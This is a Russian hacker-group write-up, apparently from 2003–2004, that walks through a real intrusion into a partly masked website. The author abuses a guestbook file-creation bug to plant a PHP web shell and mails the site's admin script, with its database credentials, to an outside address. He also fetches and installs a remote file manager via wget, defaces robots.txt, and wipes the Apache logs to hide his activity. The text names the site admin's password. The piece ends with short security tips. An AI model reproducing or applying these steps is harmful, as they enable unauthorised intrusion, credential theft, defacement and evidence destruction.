---// Название : Как был взломан su******ed.ru ---// Автор : 1dt.w0lf # Интра У нас в форуме проскочила тема что мол нам надо бы описать все дефейсы которые мы сделали, как Вы сами понимаете сделать это нереально, но вот некоторые описать вполне возможно. Данная статья и представляет собой step-by-step описание "дефейса" сайта su******ed.ru. Почему слово дефейс в скобках? - спросите вы. Отвечаю. Дефейс есть замена главной страницы сайта на свою, я же не буду (вы не ослышались, не буду) менять индекс, я сменю файл robots.txt. Почему? Ок. Все по порядку. Замечание: сейчас 12.11.2003 01:41 дефейса еще нету, то есть перед вами онлайн (если можно так выразится) описание взлома. Конечно я буквально 10 минут назад проверил возможность взлома (это не заняло много времени) и сейчас просто проделаю алгоритм который уже есть в голове, путь уже сформирован, осталось только воплотить =) Значит 10 минут назад совершенно случайно ( по какой-то ссылке ) я попал на сайт su******ed.ru. Побродил. Почитал. Насколько я понял сайт некоей хак-тимы или что-то вроде того. Залез в статьи дабы посмотреть, может нового чего для себя узнаю =) И наткнулся на статью-описание взлома этого сайта. Почитал... интересно =) Я бы так и ушел с сайта если бы в статье не было ссылки на переделаный админом файл robots.txt. Ну я открыл этот файлик (ну интересно мне =) и увидел следующее: o-----------------------=[ Вам одно новое сообщение ]=----------------------o Сколько идиотов, таких как ты, тут было =) И все они старались поиметь сайт. Конечно же это не вышло. Получилось только у одного (а точнее почти получилось). Он связался с моей службой поддержки и попробовал хакнуть методом социальной инженерии. Ему это удалось, но всё вышеописанное он сделал по моей просьбе. Советую вырубить свой сканер уязвимосте, пока тебя не засекли. [go na exit]. А если это произойдет и ты без прокси, то звеняемся, тебя вычяслят и проведут зачистку мозгов :)) Наверняка инет за счёт родителей, скорей всего выделенка. Так я про то, что пора закруглится с попыткой поставить мой сайт в позе рака! Займись чем нибудь полезным! Напиши программку, нарисуй wallpaper или напиши статью по веб-дизайну. Это не так сложно как ты думаешь... Ладно не буду тебе мозги править (хотя следовало), пойду работать! Если чё и найдешь или просто захочешь обсудить эту тему, вот ася 157799316. Удачного хака... дружжжок :)) o---------------------------------------------------------=[ The Neption ]::: Мдя... Хоть я и не старался поиметь сайт но за "Сколько идиотов, таких как ты, тут было =)" было обидно. =( Я же нормальный юзер. Решил посмотреть что в текстовом файле... И нате... обзывают идиотом =( И тут зародилось непреодолимое желание изменить этот файлик т.к. у меня уже зародилась мысля что там понаписать =) # Lets start a war Итак. Сканеры уязвимостей всяких я запускать не стал т.к. работают они медленно, мне совсем не нравятся и я предпочитаю ими не пользоватся... типа блокнот и браузер наши лучшие друзья =) Так что не ждите в статье описаний типа: Я запустил сканер и он мне выдал... бла...бла...бла... эксплоит... рут... тыр... тыр... тыр =) Начал с того с чего обычно всегда начинаю... Сбор инфы. Для начала смотреть сайт стал. Залез на форум .. php 2.0.6 обломс... далее на очереди гостевая. Залез. Проскролил в самый низ с идеей посмотреть копирайты на случай если скрипт публичный и потом скачав изучить код. Но и тут поджидал облом в виде: Copyright su******ed (с) 2003. Казалось бы надо заканчивать с гостевой и искать что-то еще но мое внимание привлек дизайн этой гостевухи и вообще её вид, что-то знакомое. Жмахнул на ссылку "Добавить сообщение" и посмотрел на какую ссылку меня кинуло: http://guest.su******ed.ru/index.php?do=add_form&page=1 Ну точняк =) Знакомая ссылка, знакомая форма =) Да это скрипт ArdGuest Standard в котором dinggo недавно нашел багу =) После этого дальнейшие действия в моей голове оформились в цепочку. =))) То о чем я расскажу далее не вошло в advisory от dinggo т.к. не представляет собой чего-то особенного и любой человек знакомый с пхп мог-бы додуматься до этого сам. Итак с помощью баги в данном скрипте возможно создавать файлы любого содержания (если конечно позволяют права): Итак я в браузере набил следующую строку: http://guest.su******ed.ru/index.php?do=add&vname=hacker&vemail=hacker@hacker.com &vcountry=Russia&vcomment=hacked&vurl= http://rst.void.ru/**/ &data_file=cmd.php Более подробно про ссылку: http://guest.su******ed.ru/index.php?do=add Передаем гостевой параметры как будто данные пришли от заполненой формы. vname=hacker&vemail=hacker@hacker.com&vcountry=Russia&vcomment=hacked Передаем имя, мыло, страну и комментарий vurl= http://rst.void.ru/**/ А вот тут передаем ссылку как бы на свой сайт. Ссылку приходится вписывать т.к. там идет проверка на наличие http:// но больше никаких проверок нет и мы вписываем в начале ссылки свой код. &data_file=cmd.php А вот тут мы обманываем скрипт и передаем ему имя файла в котором как-бы хранятся сообщения, а на самом деле имя файла который мы хотим создать. После передачи данных создается файл cmd.php следующего содержания: 20031112015931|~~|November 12, 2003 - 01:59 AM|~~|hacker|~~|hacker@hacker.com|~ ~|Russia|~~|hacked|~~| http://rst.void.ru/**/ После ввода гостевая ответила мне приятным: Ваша запись добавлена. Проверим: http://guest.su******ed.ru/cmd.php Сайт ответил: 20031112015931|~~|November 12, 2003 - 01:59 AM|~~|hacker|~~|hacker@hacker.com|~~|Russia|~~|hacked|~~| Warning: passthru() [function.passthru]: Cannot execute a blank command in /home2/su******edru/guest/cmd.php on line 1 http://rst.void.ru/**/ Отлично =) Файлик создан. Забиваю: http://guest.su******ed.ru/cmd.php?cmd=ls%20-la Сайт выдает: total 40 drwxr-xr-x 3 su******edru su******edru 512 Nov 12 01:59 . drwx------ 13 su******edru su******edru 512 Nov 7 11:24 .. -rw-r--r-- 1 su******edru su******edru 145 Nov 12 01:59 cmd.php -rw-r----- 1 su******edru su******edru 10124 Nov 5 12:06 gbsun.dat drwxr-x--- 2 su******edru su******edru 512 Aug 11 18:19 images -rw-r--r-- 1 su******edru su******edru 22048 Nov 7 13:40 index.php * Тут и далее ответ сайта я отформатировал для более наглядного вида. Забиваю: http://guest.su******ed.ru/cmd.php?cmd=cd%20../;ls%20-la Сайт выдает: [ покоцано ] drwxr-xr-x 4 su******edru su******edru 512 Nov 7 11:34 chat drwxr-xr-x 10 su******edru su******edru 1024 Sep 23 15:05 forum drwxr-xr-x 4 su******edru su******edru 512 Nov 5 15:38 ghost drwxr-xr-x 3 su******edru su******edru 512 Nov 12 01:59 guest drwxr-xr-x 5 su******edru su******edru 512 Oct 6 12:03 inga drwxr-xr-x 2 su******edru wheel 512 Nov 12 01:08 logs drwxr-xr-x 2 su******edru su******edru 512 Aug 4 18:17 mail drwxr-xr-x 7 su******edru su******edru 512 Sep 23 11:50 mist drwxr-xr-x 26 su******edru su******edru 1024 Nov 11 11:42 www drwxr-xr-x 7 su******edru su******edru 512 Nov 2 16:25 wyze drwxr-xr-x 3 su******edru su******edru 512 Oct 28 17:13 xahtep Папочка www =) Тут сайтик и валяется =) Забиваю: http://guest.su******ed.ru/cmd.php?cmd=cd%20../www/;ls%20-la Сайт выдает: [ покоцано ] -rw-r----- 1 su******edru su******edru 8889 Oct 30 21:17 addchel.php -rw-r----- 1 su******edru su******edru 9003 Oct 30 21:16 addfriend.php -rw-r----- 1 su******edru su******edru 5313 Nov 3 10:43 admin.php -rw-r----- 1 su******edru su******edru 3130 Nov 3 10:43 amx_nep.php -rw-r----- 1 su******edru su******edru 1885 Nov 3 10:44 amx_team.php -rw-r----- 1 su******edru su******edru 1606 Nov 10 17:30 box.html drwxr-xr-x 2 su******edru su******edru 512 Aug 4 18:17 cgi-bin -rwxr-x--- 1 su******edru su******edru 1564 Oct 30 11:04 cmd.exe -rw-r----- 1 su******edru su******edru 4704 Oct 7 11:15 control.html [ покоцано ] Воооо... какие интересные файлы =) cmd.exe =) Типа для горе-хакеров припасено =) Но мы пойдем другим путем... Меня заинтересовал файлик admin.php. Так как при попытке вывести его cat admin.php я получу не код скрипта а результат его выполнения я не сомневался и поэтому посылаю его себе на мыло: http://guest.su******ed.ru/cmd.php?cmd=cd%20../www/;%20cat%20admin.php%20|%20mail%20r00t@rsteam.ru Батник исправно получает код файла и что-же я вижу =) [ куча вырезанного хтмл'a ] [ куча вырезанного хтмл'a ] Опаньки. Все что надо для счастливой жизни. Это данные для базы mySQL. Логин, пароль, хост, БД. =) Мона коннектится к базе и смотреть что там есть интересного. А вот это уже пароли для админ интерфейса сайта. Для дефейса уже вполне достаточно. Наверно можно запостить новость типа: Ла-ла-ла я вас сломал. И все такое. Потыкался немного к фтп с паролем от базы данных в надежде что админ использует одинаковые пароли на эти сервисы и обломался =(((( После этого вдруг подумал почему мне удалось в самом начале создать файл cmd.php? Ведь на папку guest стоят права: drwxr-xr-x 3 su******edru su******edru 512 Nov 12 01:59 guest т.е. только владелец может писать в папку. Все просто. На команду id скрипт выдает следующее: uid=2860(su******edru) gid=2860(su******edru) groups=2860(su******edru) То есть пхп-скрипт выполняется с правами пользователя, что и дало мне права на запись в каталоги =))) Ну теперь все просто. =) У меня через пхп-скрипт были полные права на весь сайтец. Что весьма радовало. Чтобы заменить robots.txt надо было заливать более удобный для редактирования файлик а именно remview.php. Сначала залил его на свой халявный хостинг, переименовал в rem.txt Далее отдаю скрипту такую вещь: http://guest.su******ed.ru/cmd.php?cmd=wget%20mysite.by.ru/rem.txt;%20mv%20rem.txt%20rem.php После этого в каталоге гостевой появился файлик rem.php через который я и изменил файл robots.txt. Вот что у меня получилось: o------------------------=[ WARNING: LAMERS ZONE ]=-----------------------o HACKED BY RUSH SECURITY TEAM http://rst.void.ru o-----------------------=[ Вам одно новое сообщение ]=----------------------o Сколько идиотов, таких как ты, тут было =) И все они старались поиметь сайт. Конечно же это не вышло. >> Нууу... насчет вышло или не вышло я готов поспорить ;) Получилось только у одного (а точнее почти получилось). >> Уже у двоих =))) Он связался с моей службой поддержки и попробовал хакнуть методом социальной инженерии. Ему это удалось, но всё вышеописанное он сделал по моей просьбе. Советую вырубить свой сканер уязвимосте, пока тебя не засекли. [go na exit]. > Слушай... тут трабла такая... я его и не включал... Что делать то? А если это произойдет и ты без прокси, то звеняемся, тебя вычяслят и проведут зачистку мозгов :)) > Прокси? А что это такое? Мозгиии... интересно то как =))) Наверняка инет за счёт родителей, скорей всего выделенка. > Мопед... мопед... =( Так я про то, что пора закруглится с попыткой поставить мой сайт в позе рака! > Угу.. точно... пора закруглятся с этим извратом... Сайт в позе рака... подумать только > это зоофилия какая-то Займись чем нибудь полезным! Напиши программку, нарисуй wallpaper или напиши статью по веб-дизайну. Это не так сложно как ты думаешь... Ладно не буду тебе мозги править (хотя следовало), пойду работать! > Ты не поверишь... я щас статью пишу... про взлом твоего сайта... обещаю дам тебе почитать > Тока с условием что ты не будешь править мне мозги ;) Мне мои скособоченные нравятся =) Если чё и найдешь или просто захочешь обсудить эту тему, вот ася 157799316. > Уже стучусь... =) Логи потом на форум выложу... или к статье присобачу... даю 90% что ты мне не поверишь =) > наверно будешь ругаться.... =\ Удачного хака... дружжжок :)) > Спасибки конечно... но все уже закончилось =\ И не в твою пользу .... o---------------------------------------------------------=[ hacked ]::: С наилучшими пожеланиями 1dt.w0lf // RusH security team // www.rst.void.ru o---------------------------=[ конец сообщения ]=---------------------------o После этого залил на сайт скриптик для работы с mySQL и пользуясь логином и паролем полученными ранее подрубился к базе. Немного полазал, посмотрел. В базе не оказалось ничего стоящего =( конечно там были пароли от форума но расшифровывать мне не хотелось и просто поиздеваться над форумом тоже не входило в мои планы. Поэтому я залез в папку /logs/ и потер там логи апача, стер свои скрипты и добавил админа этого сайта в свою аську (дабы рассказать ему про багу). Два дня я ждал админа в аське, но он так в онлайне и не появился... =( Ну чтож... пора выкладывать статью =) # Теперь немного советов про защиту: 1. Не используйте на своем сайте свободно распространяемые скрипты. 2. Если все таки используете такие скрипты то стоит следить за багтраком чтобы всегда быть в курсе новых дырок которые могут быть обнаружены в данных скриптах. 3. Убрав с таких скриптов копирайты вы конечно осложните поиск автора скрипта но не стоит забывать что во-первых убирая копирайты вы поступаете не совсем корректно по отношению к автору, а во-вторых это не поможет в случае если атакующий ранее сталкивался с данными скриптами, в таком случае достаточно будет просто беглого взгляда чтобы определить тот ли это скрипт или не тот. 4. Наиболее правильно будет все скрипты для своего сайта писать самому (если конечно уровень кодинга позволяет это сделать) либо обратится за помощью к людям которые это сделают профессионально с упором на безопасность. (например к нам =) сорри за рекламу =)) 5. Как вы могли заметить выше в статье админ данного хостинга использует в качестве пароля для админ-интерфейса слово "sven" что являет собой офигительную прореху в защите. Использовать такие простые и короткие пароли крайне неосмотрительно т.к. при желании перебрать такой пароль не займет много времени. Точнее пароль будет подобран практически сразу. И на этом всё... cya... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ o---[ RusH security team | http://rst.void.ru | 21.01.2004 ]---o